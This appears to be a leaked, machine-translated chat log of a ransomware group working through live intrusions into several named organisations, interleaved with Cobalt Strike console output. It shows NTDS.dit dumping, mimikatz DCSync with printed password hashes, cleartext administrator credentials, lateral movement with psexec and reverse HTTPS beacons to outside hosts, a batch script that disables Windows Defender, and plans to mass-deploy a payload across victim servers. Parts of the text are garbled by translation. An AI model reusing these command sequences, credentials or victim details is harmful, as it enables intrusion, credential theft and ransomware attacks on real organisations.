](https://mediaeveryone.com/group/saiglobal-com?msg=35agEhdwKYvDpwkSZ) and why 3 domains inside?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vtPCrjfCF2HwvMfKx) nobody read)well in general here and trust was a chore, the next time will be much faster)and all the rest is a matter of time, routine)the hardest was to get into the trustda I also got tired) let's finish, there is not much left) How nice that you with us to win) tomorrow a hard day sleep not, already half an hour should finishNow all night work?do do, now, forgot@user9 where are EA, DA, LA? kerbs separately really kerbs - kerb, the rest hashes[ ](https://mediaeveryone.com/group/saiglobal-com?msg=tm3NpqFRoaH3MFnyd) kerbs - dcsync
hashes - kerb? have not arrived yet? i already passed the session so how are you doing with the others? tomorrow from 3:30? +5 servers not distributed leave as is104.238.205.128aha, in the archive and take away in the report
beacon> run ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q
[*] Tasked beacon to run: ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q
[+] host called home, sent: 78 bytes
[+] received output:
ntdsutil: ac in ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: cr fu c:\windows\temp\abcd
Creating snapshot...
Snapshot set {30839d3a-489d-4c9e-9a4f-feea14764ebf} generated successfully.
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} mounted as C:\$SNAP_202010061119_VOLUMEC$\
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202010061119_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:{windows\temp\abcd\Active Directory\ntds.dit

                  Defragmentation Status (% complete)

          0 10 20 30 40 50 60 70 80 90 100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying c:\windows\temp\abcd\registry\SYSTEM
Copying c:{windows\temp\abcd\registry\SECURITY
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} unmounted.
IFM media created successfully in c:\windows\temp\abcd
ifm: q
ntdsutil: q


I do not have a ping to you have not come to you jammed yes-is? +maybe you passcutted your coba mb) I have live from the login domain did not touch them when the data center jumped from saig.frd.global why then sag at the same time?i have not looked in different tries have i asked above445 port was open? accesses are valid?
beacon> shell tasklist /s 10.225.10.215 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.215 /v
[+] host called home, sent: 59 bytes
``Is there a command you in winlogon? On any sysmos and allhost called home, sent 60 bytes, no output``.
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:legalco.local /all /csv command
[+] host called home, sent: 438858 bytes
[-] could not spawn C:\Windows\system32\mstsc.exe: 2
[-] Could not connect to pipe: 2
``What's the error?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

``taskillst doesn't give out processes where I put them strange that not all servers are in the servers group)`` what a strange group of servers...``

Servers:
	USATLHC-360FS1.datacenter.local
	USHDC1-360FS1.datacenter.local


	USHDC1-360MX2.datacenter.local
	USHDC1-360MX1.datacenter.local


	USHDC1-CSPFPS03.datacenter.local
	USHDC1-CSPFPS12.datacenter.local
	USHDC1-CSPFPS08.datacenter.local
	USHDC1-CSPFPS02.datacenter.local
	USHDC1-CSPFPS04.datacenter.local
	USHDC1-CSPFPS14.datacenter.local
	USHDC1-CSPFPS13.datacenter.local
	USHDC1-CSPFPS10.datacenter.local
	USHDC1-CSPFPS01.datacenter.local
	USHDC1-CSPFPS09.datacenter.local
	USHDC1-CSPFPS11.datacenter.local
	USHDC1-CSQFPS01.datacenter.local
	USHDC1-CSQFPS02.datacenter.local
	USHDC1-CSPFPS06.datacenter.local
	USHDC1-CSPFPS05.datacenter.local
	USHDC1-CSPFPS07.datacenter.local


	USHDC1-CSPMGW02.datacenter.local
	USHDC1-CSPMGW03.datacenter.local
	USHDC1-CSPMGW01.datacenter.local
	USHDC1-CSPMGW04.datacenter.local
``Could I log what...? I logged what I could, I logged f by domain login and hash immediately here, did you log YES and hashes? 2 minutesThat takes time``
ERROR: Logon failure: unknown user name or bad password
``First things first
``beacon> shell tasklist /s 10.195.23.13 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.13 /v
[+] host called home, sent: 58 bytes
``Let's find a worker and get those admins' hashes off. Don't do that again, you'll get bogged down.
beacon> shell tasklist /s 10.195.23.14 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.14 /v
[+] host called home, sent: 58 bytes
[+] received output:
ERROR: Logon failure: unknown user name or bad password.


``or are the creds invalid?``All 5 off rps?``Are there only 5@user3 many more left?``I'm not done,don't get the tosslists here inside the hell info,hashes,creds.txt and tdarhiv = name of domainsdump reports by domainsdoesn't finishdosort cars0.dead.zohocorpin.comd I remembered that we were just a wpn and couldn't find a wpn past? since fall stilld like 100 years no.... (do we not have sessions here? passyone here will be exactly about 20 + would be good. in tv there will be swampy yes? all the same as yesterday)
tv with what work7:space_invader:hihi Hi all, it's deaf here, no luck to get online, still under vpnom tell me how are things here?
 Remote Admin
```
That means he's an admin) AWS-VPDC01 10.5.20.30 ``
beacon> rev2self
[*] Tasked beacon to revert token
beacon> make_token .\administrator Tabiam*987
[*] Tasked beacon to create a token for .\administrator
beacon> jump psexec_psh AWS-VDDC01 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (fixtom.com:443) on AWS-VDDC01 via Service Control Manager (PSH)
[+] host called home, sent: 214325 bytes
[+] Impersonated DATACENTER2\Administrator
[-] Could not open service control manager on AWS-VDDC01: 5
[-] Could not connect to pipe (\AWS-VDDC01\pipe\status_59f6): 1326
``These are the balls, so far, just these``.
\AWS-VPDC02/ADMIN$ - Remote Admin
\AWS-VPDC02/PC$ - Default share
\AWS-VPDC02/IPC$ - Remote IPC
\AWS-VPDC02$ - Logon server share
\\Logon server share
\\{\HO-VPDC01/ADMIN$ - Remote Admin
\\{\HO-VPDC01\C$ - Default share
\\Remote IPC$ - Remote IPC
\\Home server share - Logon server share
\\Logon server share (SYSVOL)
\AWS-VDDC01/ADMIN$ - Remote Admin
\\{\AWS-VDDC01\C$ - Default share
\AWS-VDDC01/IPC$ - Remote IPC
\\Logon server share (SNETLOGON)
\\Print$ - Printer Drivers
\\SYSVOL - Logon server share
\AWS-VPDC01/ADMIN$ - Remote Admin
\AWS-VPDC01\C$ - Default share
\AWS-VPDC01/IPC$ - Remote IPC
\\Logon server share (SNETLOGON)
\\Logon server share
\AWS-VPLODC01/ADMIN$ - Remote Admin
\AWS-VPLODC01$ - Default share
\AWS-VPLODC01/IPC$ - Remote IPC
\\Logon server share (SNETLOGON)
\AWS-VPLODC01\SYSVOL - Logon server share

``````
``Check carefully in the syslogin, where did we get this from? KLLOGIN=administrator KLPASSWD=Tabiam*987The script doesn't find the ball, no trusts, it writes to remote desktop usersThere seems to be no trusts
```

[*] 10/02 14:15:37 - Executing PowerView Get-DomainTrust via PowerPick
[*] Tasked beacon to run: Get-DomainTrust -Server 10.7.20.30 -Domain matches.com (unmanaged)
[+] host called home, sent: 133715 bytes
If they are not going to be dismounted, then let's go back to the original problem: I don't understand why they shouldn't be dismounted, but if they are, why should I ignore them?
OU=OLD Disabled Users,OU=Disabled Accounts
``Can't take anything down, just up-to-date information especially after news like this is always goodAfter this, the lists of DAs may have changed, as well as the lists of DCs, some of the network may have been closed```
CN=Service Accounts
``Then maybe the service ac-[ ](https://mediaeveryone.com/group/matches?msg=oG8izZZgEp6uYmy5h) DA was? Pull out the lists of pcs, users and in them by group find domain controller, domain adminI don't understand a bit why to do this on a dedicat``
beacon> shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
[*] Tasked beacon to run: net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
[+] host called home, sent: 132 bytes
[+] received output:
The request will be processed at a domain controller for domain WORKGROUP.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

``````

beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

[-] Error: 0

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
``Yes, EA, DK re-do list-ping see host? Did I do something wrong again?
beacon> net view \\\HK-VPDC01 /all
[*] Tasked beacon to run net view on \\HK-VPDC01 /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\\HK-VPDC01 /all':

 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
[-] Error: 87

beacon> net view \AWS-VDDC01 /all
[*] Tasked beacon to run net view on \AWS-VDDC01 /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\AWS-VDDC01 /all':

 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
[-] Error: 87
``````
.PARAMETER Domain
        Domain to query for machines.
````Invoke-ShareFinder -HostList hosts.txt
function Invoke-ShareFinder {
    <#
        .SYNOPSIS
        Finds (non-standard) shares on machines in the domain.
        Author: @harmj0y
        
        .DESCRIPTION
        This function finds the local domain name for a host using Get-NetDomain,
        queries the domain for all active machines with Get-NetComputers, then for
        each server it lists of active shares with Get-NetShare. Non-standard shares
        can be filtered out with -Exclude* flags.
        .PARAMETER HostList
        List of hostnames/IPs to search.
        .PARAMETER ExcludeStandard.
        Exclude standard shares from display (C$, IPC$, print$ etc).
        .PARAMETER ExcludePrint
        Exclude the print$ share
        .PARAMETER ExcludeIPC
        Exclude the IPC$ share
        .PARAMETER CheckShareAccess
        Only display found shares that the local user has access to.
        .PARAMETER CheckAdmin
        Only display ADMIN$ shares the local user has access to.
        .PARAMETER Ping
        Ping each host to ensure it's up before enumerating.
        .PARAMETER NoPing
        Ping each host to ensure it's up before enumerating.
        .PARAMETER NoPing
        Don't ping each host to ensure it's up before enumerating.
        .PARAMETER Delay
        Delay between enumerating hosts, defaults to 0
        .PARAMETER Jitter
        Jitter for the host delay, defaults to +/- 0.3
        .PARAMETER Domain
        Domain to query for machines.
        .EXAMPLE
        > Invoke-ShareFinder
        Find shares on the domain.
        
        .EXAMPLE
        > Invoke-ShareFinder -ExcludeStandard
        Find non-standard shares on the domain.
        .EXAMPLE
        > Invoke-ShareFinder -Delay 60
        Find shares on the domain with a 60 second (+/- *.3)
        Randomized delay between touching each host.
        .EXAMPLE
        > Invoke-ShareFinder -HostList hosts.txt
        Find shares for machines in the specified hostlist.
        .LINK
        http://blog.harmj0y.net
Also, you can make life a lot easier for yourself.
net view \hostname /all
```
take ad_computers.txt and from there one by one insert hostnames into the command instead of hostnameda) ``)
beacon> psinject 7256 x64 Invoke-ShareFinder
[*] Tasked beacon to psinject: Invoke-ShareFinder into 7256 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:
WARNING:
[!] No hosts found!

beacon> net view \\hostname /all
[*] Tasked beacon to run net view on \hostname /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\\hostname /all':

 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
[-] Error: 87
Do not forget to re-create EA, DA lists all where there may be a password from the service DA or just from the DA, they have scripts ps1, cmd,bat, some credentials, password, account files, etc.Then do it now, if the script does not start, then manually (or via bATK) through the `net view \\\hostname /all` there are already a lot of things tried, I thought and did it, now on the search looked - was not - have you run it when the domain is visible?as a tool or output in this domain?
beacon> shell wmic /node:192.168.110.198 logicaldisk get caption /user:dom.helpathome.com\abunag /password:Start2020
[*] Tasked beacon to run: wmic /node:192.168.110.198 logicaldisk get caption /user:dom.helpathome.com\abunag /password:Start2020
[+] host called home, sent: 133 bytes
[+] received output:
Invalid GET switch.

``I'll finish up here quietly and dovroverify it, and then divide the tasks by server@tl1 all there.
you're not needed here anymore, go to helpathomeThe handle is invalid.
it's a protection against running under a system context by removing the token beforehand and specifying YES tokens when done - try without the "-s" parameter let it spin not even read the conf) seems to have gone with the file ... see what you're doing
try it with the cradle if you can't get the service under the token to try and bump the userhosts in the file and check that the error is flying at the moment of the domain inquiry
Reading from a File
Another way you can run commands on multiple computers at once is to use a text file. Using the syntax @<filename.txt>, PsExec will read every line in the text file as if it were a computer name. It will then process each computer individually.
``error tm1psek caught the bug = )How are you doing?
it's almost 3 hours already and psexec is already done, what's the difference, kill the services that can hold files and that's it? who knows how to tell if it's autorun service or not? and from token domain admin itself in system32 drop only psexec and the file itself
psexec \\* -d -s -h start.exe -accepteula -y
``and run it like this@tl1 drop psexec utility on DC2 while the file works with the server systems already "touched"``they switched to Acronisvlom OK, I already found that NACs are inactive.there it is not there or turn all domain records in dnscmd I thought there is a full page dump from Everhirs Peak to the bottom of the Mariana Trench
   DNS Servers ... ... ... ... : 192.168.0.222
                                       127.0.0.1

I wonder if you can at least show them? @tl1 dump the DK dns records, maybe we'll find something else there....2not good for two reasons
1 - because I didn't tell you to take it off.
2 - because no one figured it out.

= )but the DNS records from the DNS server have not been removed? it is currently inactiveThis is not very relevant in part, but it is registered in the DNS with a busy name
Pinging nasstorage1.loomisco.com [192.168.0.231] with 32 bytes of data:Even if I saw it192.168.0.231 does anyone know this host?
dominant server
webservers and kilt pids that may occupy important processesstop services that are in autorun on momaunnyh machines so what? I have not changed it) the main thing then run under the same tokenDaSession made token in the SYSTEM what? systems rights with token? and under them to run the same file where the mounTeam
be sure to run the file with SYSTEM rights
Status Local Remote Network

-------------------------------------------------------------------------------
OK A:        \loomiswebsrv4\d$ Microsoft Windows Network
OK E:        \loomisgw2\d$ Microsoft Windows Network
OK Q:        \loomiswebsrv4\c$ Microsoft Windows Network
OK W:        \loomiswebsrv4\f$ Microsoft Windows Network
OK X:        \loomisgw2\c$ Microsoft Windows Network
OK Z:        \loomiswebsrv4\e$ Microsoft Windows Network

``There are all active logical disks of the 4 hosts where our file was deleted by an aver
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 170 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK E:        \TLCAutoTFR.loomisco.com\c$
                                                Microsoft Windows Network
OK F:        \TLCEPICDB01.loomisco.com\c$
                                                Microsoft Windows Network
OK G:        \TLCEPICDB01.loomisco.com\e$
                                                Microsoft Windows Network
OK H:        \TLCEPICDB01.loomisco.com\f$
                                                Microsoft Windows Network
OK I:        \TLCSQLDB1.loomisco.com\c$
                                                Microsoft Windows Network
OK J:        \TLCSQLDB1.loomisco.com\e$
                                                Microsoft Windows Network
OK L:        \TLCSQLDB1.loomisco.com\f$
                                                Microsoft Windows Network
OK M:        \TLCEPICIIS1.loomisco.com\c$
                                                Microsoft Windows Network
The command completed successfully.


``We end up with something like this
beacon> shell wmic /node:loomiswebsrv4 logicaldisk get caption
[*] Tasked beacon to run: wmic /node:loomiswebsrv4 logicaldisk get caption
[+] host called home, sent: 79 bytes
[+] received output:
Caption

C:

D:

E:

F:

G:




beacon> shell wmic /node:loomisgw2 logicaldisk get caption
[*] Tasked beacon to run: wmic /node:loomisgw2 logicaldisk get caption
[+] host called home, sent: 75 bytes
[+] received output:
Caption

C:

D:

E:
``Anytime I try to upload a file''.
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
        0 file(s) copied.

``Errors like this``
beacon> jump psexec 10.10.10.5 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_9072) on 10.10.10.5 via Service Control Manager (\\10.10.10.5\ADMIN$\c316488.exe)
[+] host called home, sent: 287849 bytes
[-] could not upload file: 384
[-] Could not open service control manager on 10.10.10.5: 1722
[-] Could not connect to pipe: 384
beacon> jump psexec loomiswebsrv4 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_9072) on loomiswebsrv4 via Service Control Manager (\loomiswebsrv4\ADMIN$\7261303.exe)
[+] host called home, sent: 285742 bytes
[-] could not upload file: 384
[+] host called home, sent: 2122 bytes
[-] Could not open service control manager on loomiswebsrv4: 1722
[-] Could not connect to pipe: 384
To find out all logical drives on these hosts where the file does not start do the following

shell wmic logicaldisk get caption``
Application Server:
    TLCEPICAS01.loomisco.com +

Web DB:
    loomisgwdb2.loomisco.com +

File Server:
    TLCStorage1.loomisco.com +
    ScanStorage.loomisco.com +
    EobStorage.loomisco.com +
    Wyomissing_Ex1.loomisco.com +
    STORAGE.loomisco.com +

FAX Server:
    LOOMISFAXR02.loomisco.com +
    LOOMISFAXR01.loomisco.com -

Print Server:
    Printsrv16.loomisco.com +
    Printsrv08.loomisco.com +

Finance:
    FSITrack.loomisco.com +

Web Server:
    TLCWebP2.loomisco.com +
    loomiswebsrv4.loomisco.com -
    TLCWEBT1.loomisco.com +
    TLCWEBP1.loomisco.com +
    loomisgw2.loomisco.com -

Utility Server:
    TLCMONITORING.loomisco.com +
    TLCSophos.loomisco.com +

VMs:
    WebChat.loomisco.com +
    Metafile-vm1.loomisco.com +
    LOOMISGT2.loomisco.com +

HCL Sametime:
(HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
    LDSWYO21.loomisco.com +

Bitvise SSH Server; DHCP:
    TLCSKLM2.loomisco.com +

Applied Epic
(Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
    EpicAPM.loomisco.com +
    TLCEPICCS01.loomisco.com +
``Well, I'm married there.
I need it for nowFAXR01 do not touchLOOMISFAXR01 on what? 1) I am on the current machine from where the session to run too? through the letter so we do the following
- leave all sessions on these servers open to make sure the processes occupied by the other files are dead before running the file (manually just kill them)
- Mount all logical drives of these 4 servers on one "own" serverDisassemble it makes no sense in fact, there may be two reasons for this
1) avera policies haven't been updated (since we haven't uninstall the agent itself, it keeps working on its own policies explicitly assigned to these hosts)
2) vindefi is a fierce windup, there are 4 hosts where the file is being pulled down because of some "special" settings avera only 2 out of 30 servers did not start via jump but started later via dll loading of stager and wmic at the moment manual work + the rest on their list go through everything is ready
You don't need to touch them.
I took these from your list and put them to work
Application Server:
    TLCEPICAS01.loomisco.com

Web DB:
    loomisgwdb2.loomisco.com +

File Server:
    TLCStorage1.loomisco.com +
    ScanStorage.loomisco.com +
    EobStorage.loomisco.com +
    Wyomissing_Ex1.loomisco.com +
    STORAGE.loomisco.com +
``Go to the bottom again + on pvsh you amsi works not psexec- don't open it```
Application Server:
    TLCEPICAS01.loomisco.com

Web DB:
    loomisgwdb2.loomisco.com

File Server:
    TLCStorage1.loomisco.com
    ScanStorage.loomisco.com
    EobStorage.loomisco.com +
    Wyomissing_Ex1.loomisco.com -
    STORAGE.loomisco.com -.

FAX Server:
    LOOMISFAXR02.loomisco.com -
    LOOMISFAXR01.loomisco.com -

Print Server:
    Printsrv16.loomisco.com -
    Printsrv08.loomisco.com +

Finance:
    FSITrack.loomisco.com

Web Server:
    TLCWebP2.loomisco.com -
    loomiswebsrv4.loomisco.com -
    TLCWEBT1.loomisco.com -
    TLCWEBP1.loomisco.com -
    loomisgw2.loomisco.com -

Utility Server:
    TLCMONITORING.loomisco.com +
    TLCSophos.loomisco.com

VMs:
    WebChat.loomisco.com +
    Metafile-vm1.loomisco.com -
    LOOMISGT2.loomisco.com +

HCL Sametime:
(HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
    LDSWYO21.loomisco.com -

Bitvise SSH Server; DHCP:
    TLCSKLM2.loomisco.com -

Applied Epic
(Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
    EpicAPM.loomisco.com +
    TLCEPICCS01.loomisco.com -
``Yeah, bottoms up, you went from the bottom of the list, right? I'm taking these to work, okay?

```
Application Server:
    TLCEPICAS01.loomisco.com

Web DB:
    loomisgwdb2.loomisco.com

File Server:
    TLCStorage1.loomisco.com
    ScanStorage.loomisco.com
    EobStorage.loomisco.com
    Wyomissing_Ex1.loomisco.com
    STORAGE.loomisco.com
``consider that no one has heard it)`` I get it, my token is not setenen read)))))) there will always be a percentage of machines where you can not jump because either a ban on running the service is or hz
all jumps work through the service it then need to open the file and go on skip this, put a mark if you paid attention you can not open the service does not want to open
beacon> jump psexec_psh loomisgw2.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on loomisgw2.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7825 bytes
[-] Could not open service control manager on loomisgw2.loomisco.com: 1722
[+] host called home, sent: 206472 bytes
[-] Could not connect to pipe (\loomisgw2.loomisco.com\pipe\status_9072): 384
beacon> jump psexec_psh TLCWEBT1.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCWEBT1.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7824 bytes
[-] Could not open service control manager on TLCWEBT1.loomisco.com: 5
[+] host called home, sent: 206454 bytes
[-] Could not connect to pipe (\TLCWEBT1.loomisco.com\pipe\status_9072): 2
beacon> jump psexec_psh loomiswebsrv4.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on loomiswebsrv4.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7829 bytes
[-] Could not open service control manager on loomiswebsrv4.loomisco.com: 1722
[+] host called home, sent: 206474 bytes
[-] Could not connect to pipe (\loomiswebsrv4.loomisco.com\pipe\status_9072): 384

``Did you do it without forcing the GPO policies require up to an hour and a half do it if not, you did not do it there was this item? did you do everything according to the instructions@tl1 did you force the gpoapdate? skip this for now, we can bypass it in a slightly different way at the end```
beacon> shell def.bat
[*] Tasked beacon to run: def.bat
[+] host called home, sent: 38 bytes
[+] received output:

C:\Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f
ERROR: Access is denied.


C:{Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:{Windows\ /t reg_dword /d 0 /f
ERROR: Access is denied.


C:{Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
ERROR: Access is denied.


C:{Windows\system32>reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
The operation completed successfully.


C:\Windows\system32>powershell.exe /c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows
Add-MpPreference : The term 'Add-MpPreference' is not recognized as the name
of a cmdlet, function, script file, or operable program. Check the spelling of
the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
   mmandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
 

C:{Windows\system32>sc config WinDefend start= disabled
[SC] OpenService FAILED 5:

Access is denied.


C:\Windows\system32>sc stop WinDefend
[SC] OpenService FAILED 5:

Access is denied.


C:{Windows\system32>powershell.exe -exec Bypass /c Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference : The term 'Set-MpPreference' is not recognized as the name
of a cmdlet, function, script file, or operable program. Check the spelling of
the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ Set-MpPreference -DisableRealtimeMonitoring $true.
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co
   mmandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

``And here's a protected registry hive, and this is a + - knocks out Defender``.
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
powershell.exe /c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows
sc config WinDefend start= disabled
sc stop WinDefend
powershell.exe -exec Bypass /c Set-MpPreference -DisableRealtimeMonitoring $true

Now the problems have started, which can only be "caught" by manual control.
TLCEPICIIS1 - the file is cut by an aver on startup, which one - vindef or sofos is not clear because both PIDs are present and for this in any case better to run manually ie, change the date on all files in the root of the disk the most important thing to check manually that the file works ud and plenty of alternatives
batch
run it via psekzek
remote eczekUЪ because I left it on my list I don't see dk in the list))) you can do it in a hundred other ways - but here it is quite convenient and so because the network is small I load on each) I am not lazy) a few clicks do not touch the dk till the end.I top down this is your servers
bottom up move down the list or upload to each?
Application Server:
    TLCEPICAS01.loomisco.com

Web DB:
    loomisgwdb2.loomisco.com

File Server:
    TLCStorage1.loomisco.com
    ScanStorage.loomisco.com
    EobStorage.loomisco.com
    Wyomissing_Ex1.loomisco.com
    STORAGE.loomisco.com

FAX Server:
    LOOMISFAXR02.loomisco.com
    LOOMISFAXR01.loomisco.com

Print Server:
    Printsrv16.loomisco.com
    Printsrv08.loomisco.com

Finance:
    FSITrack.loomisco.com

Web Server:
    TLCWebP2.loomisco.com
    loomiswebsrv4.loomisco.com
    TLCWEBT1.loomisco.com
    TLCWEBP1.loomisco.com
    loomisgw2.loomisco.com

Utility Server:
    TLCMONITORING.loomisco.com.
    TLCSophos.loomisco.com

VMs:
    WebChat.loomisco.com
    Metafile-vm1.loomisco.com
    LOOMISGT2.loomisco.com

HCL Sametime:
(HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
    LDSWYO21.loomisco.com

Bitvise SSH Server; DHCP:
    TLCSKLM2.loomisco.com

Applied Epic
(Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
    EpicAPM.loomisco.com
    TLCEPICCS01.loomisco.com
where is the executable where you can run it from where? I'm running the executable while I'm going through an open session in the list of servers so that's it, there's nothing interesting)) this should not stop you
3 is only 3 times more than 1
Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender
``there's no simple windows defenderThat's different from the guide because you have to disable it where there's no sofos agentTurn it off quietly Or touch it? I mean don't touch windef? lol) thank fuck dad for these 21st century black sessions5 sessions in less than a minute
beacon> jump psexec_psh TLCBENTS02.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCBENTS02.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214286 bytes
[+] received output:
Started service 2c89d98 on TLCBENTS02.loomisco.com
beacon> jump psexec_psh TLCBENTS01.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCBENTS01.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214293 bytes
[+] received output:
Started service 3a753bc on TLCBENTS01.loomisco.com
beacon> jump psexec_psh TLCRDSLIC1.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCRDSLIC1.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214302 bytes
[+] received output:
Started service 5db0202 on TLCRDSLIC1.loomisco.com
beacon> jump psexec_psh TLCEPICTS02.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCEPICTS02.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214296 bytes
[+] received output:
Started service 6e0d775 on TLCEPICTS02.loomisco.com
beacon> jump psexec_psh TLCEPICTS01.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCEPICTS01.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214300 bytes
[+] received output:
Started service cdbd232 on TLCEPICTS01.loomisco.com
``However, vindex didn't start on those servers where the agent is cut off, we just cut it off and now we're showing the focus.
since we haven't deleted the agent we're live showing.... I'm about
beacon > ssreenhoto disconnect vindef by GPOhttp://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/рдпты see the line at the bottom? it looks like the line of cobalt? you know where the start menu and so on)and see how the policies are applied respectively? this screenshot from cobalt or rd if it looks so now turn off sofos through the console by adding new policy and update agents
then we'll chop windefender via GPO policy right away, let's go, we'll get started - you'll help if needed
